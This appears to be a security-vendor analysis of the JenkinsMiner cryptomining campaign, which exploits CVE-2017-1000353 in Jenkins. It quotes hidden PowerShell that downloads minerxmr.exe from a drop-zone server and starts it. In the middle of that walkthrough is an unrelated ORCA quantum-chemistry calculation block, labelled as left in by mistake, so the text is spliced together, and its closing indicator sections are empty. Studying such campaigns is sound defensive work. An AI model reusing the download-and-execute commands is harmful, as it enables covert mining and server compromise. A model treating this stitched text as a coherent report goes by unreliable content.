The Check Point research team has discovered what could potentially become one of the biggest malicious mining operations ever seen.
As seen in our previous report of the RubyMiner, these types of attacks can be incredibly lucrative. Similar to the RubyMiner as well, the JenkinsMiner could negatively impact the servers, causing slower load times and even issuing a Denial of Service (DoS). Depending on the strength of the attack, this could prove to be very detrimental to the machines.
How the JenkinsMiner Campaign Works
By sending 2 subsequent requests to the CLI interface the crypto-miner operator exploits the known CVE-2017-1000353 vulnerability in the Jenkins Java deserialization implementation. The vulnerability is due to lack of validation of the serialized object, which allows any serialized object to be accepted.
Immediately after sending the first initial session request, the second crafted request is issued (matched by the session header). The last request contains two main objects: The first is the Capability object that informs the server for the client capabilities, the second is the Command object which contains the Monero miner payload as shown in the following exploited vector.
Figure 1: CVE-2017-1000353 Exploited “in the wild” leveraging XMRig
Looking into figure 1, we see the second crafted request containing the two serialized objects with the injected PowerShell code to execute the JenkinsMiner.
Injected Code
Now that the injection has made its way onto the Jenkins server, let’s analyze the different parts of the code.
powershell.exe -WindowStyle Hidden:
Hidden PowerShell initiation, which will allow the script to run in the background:
A variable is being set to a new web-client object using case-sensitive diversion to try to evade security products.
$P.DownloadFile(‘’, ‘C:\\Windows\\minerxmr.exe’)
Download the minerxmr.exe miner file from the drop-zone server, and store it on the windows server.
START C:\\Windows\\minerxmr.exe
These quantum chemistry results were left in the piece by mistake
~~~
ORCA calculation (wB97M-V/def2-TZVPD) on C36H59N5O6PS2Y as an isolated structure at a distorted geometry.

Structure (ORCA input):
```
! wB97M-V def2-TZVPD RIJCOSX def2/J DEFGRID3
* xyz 2 1
Y -0.5904 0.0666 0.2502
C -3.1074 -4.1968 0.6352
O -3.6334 -3.1431 -0.1770
C -2.9220 -2.0384 -0.2545
O -1.8041 -1.8953 0.2548
N -3.5345 -1.0631 -0.9509
N -2.9265 0.1980 -1.0301
H -3.8971 -4.9415 0.6938
H -2.8671 -3.8184 1.6304
H -2.2111 -4.6239 0.1818
H -4.4698 -1.2172 -1.3151
H -3.5048 0.9151 -0.5832
H -2.7396 0.4773 -2.0021
O 1.1085 -1.4128 0.0627
S 1.2608 -2.8755 0.4204
C 1.0341 -2.9531 2.2706
C 2.2649 -2.9211 3.1599
C 3.0185 -1.5900 3.1336
C 2.3645 -0.4808 3.9519
S 1.4733 0.8188 2.9877
O 0.3912 0.0585 2.2557
C 2.7110 1.1506 1.6943
C 4.0762 1.2068 1.9377
C 4.9418 1.5004 0.8952
C 4.4518 1.7786 -0.3703
C 3.0849 1.7669 -0.5979
C 2.2156 1.4456 0.4319
C 3.0435 -3.1900 0.3230
C 3.8894 -2.1685 -0.0672
C 5.2572 -2.3797 -0.0615
C 5.7665 -3.6147 0.3070
C 4.9092 -4.6535 0.6372
C 3.5388 -4.4470 0.6385
H 0.4765 -3.8770 2.4208
H 0.3825 -2.1002 2.4748
H 2.9524 -3.7170 2.8711
H 1.9463 -3.1419 4.1805
H 3.1261 -1.2716 2.0978
H 4.0239 -1.7675 3.5171
H 3.0853 0.0664 4.5554
H 1.6047 -0.8753 4.6264
H 4.4787 1.0061 2.9170
H 6.0037 1.5249 1.0776
H 5.1349 2.0020 -1.1750
H 2.6903 2.0367 -1.5636
H 1.1331 1.4601 0.2501
H 3.4692 -1.2165 -0.3571
H 5.9180 -1.5731 -0.3347
H 6.8332 -3.7696 0.3354
H 5.3049 -5.6202 0.9072
H 2.8635 -5.2500 0.8912
C 0.8308 0.9893 -5.6458
N 0.8621 0.7236 -4.2187
C 2.1117 0.1222 -3.7833
P -0.5135 0.3025 -3.3544
O -0.1568 0.3305 -1.9014
N -1.7194 1.4330 -3.6324
C -2.8141 1.2887 -4.5781
C -1.2322 2.8021 -3.5236
N -1.2079 -1.1802 -3.7628
C -0.8355 -2.3345 -2.9644
C -1.4026 -1.5420 -5.1608
H 0.9878 0.0868 -6.2427
H 1.6260 1.6973 -5.8903
H -0.1182 1.4356 -5.9289
H 2.2897 -0.8576 -4.2379
H 2.0891 0.0075 -2.7021
H 2.9389 0.7795 -4.0559
H -3.1894 0.2689 -4.5566
H -2.5382 1.5437 -5.6058
H -3.6146 1.9692 -4.2772
H -0.4759 2.8371 -2.7409
H -2.0556 3.4596 -3.2449
H -0.8032 3.1642 -4.4603
H -0.5333 -2.0124 -1.9690
H -0.0059 -2.8893 -3.4129
H -1.6957 -3.0035 -2.8887
H -1.5472 -0.6617 -5.7777
H -2.2862 -2.1793 -5.2435
H -0.5495 -2.0993 -5.5558
C -2.3246 -0.4055 4.0368
C -2.7975 0.1523 2.6904
C -4.1994 -0.3596 2.3478
C -2.7744 1.6660 2.6864
C -3.5184 2.3535 3.6317
C -3.5197 3.7334 3.6751
C -2.7685 4.4343 2.7512
C -2.0233 3.7921 1.7747
C -1.3205 4.6638 0.7553
C -2.1918 4.7442 -0.5033
C 0.1075 4.2327 0.4215
C -2.0197 2.3760 1.7203
O -1.3507 1.7398 0.7567
H -2.1503 -1.4790 3.9693
H -3.0687 -0.2303 4.8091
H -1.3991 0.0847 4.3331
H -2.0784 -0.2071 1.9176
H -4.8967 -0.0717 3.1296
H -4.2213 -1.4446 2.2625
H -4.5565 0.0750 1.4161
H -4.1109 1.8057 4.3468
H -4.0976 4.2518 4.4220
H -2.7653 5.5136 2.7824
H -1.2620 5.6697 1.1835
H -2.3207 3.7465 -0.9234
H -1.7348 5.3944 -1.2484
H -3.1689 5.1489 -0.2440
H 0.1089 3.3473 -0.2142
H 0.6527 4.0258 1.3421
H 0.6116 5.0357 -0.1129
*
```

Values from the calculation:
- Kohn-Sham gap: 8.00 eV
- E: -90021.022 eV
~~~
Finally the start command is sent to execute the miner to start generating cryptocurrency for the attacker at the user’s expense.
Figure 2: The Drop-Zone server
Heading to the 4th Million
The operation uses a hybridization of a Remote Access Trojan (RAT) and XMRig miner over the past months to target victims around the globe. The miner is capable of running on many platforms and Windows versions, and it seems like most of the victims so far are personal computers. With every campaign, the malware has gone through several updates and the mining pool used to transfer the profits is also changed.
Although the attack is well operated and maintained, and many mining-pools are used to collect the profits out of the infected machines, it seems that the operator uses only one wallet for all deposits and does not change it from one campaign to the next. So far, $3 million has been mined.
Figure 3: The perpetrator’s Monero wallet.
IPS protections:
Anti-Bot protections:
Domain and IP: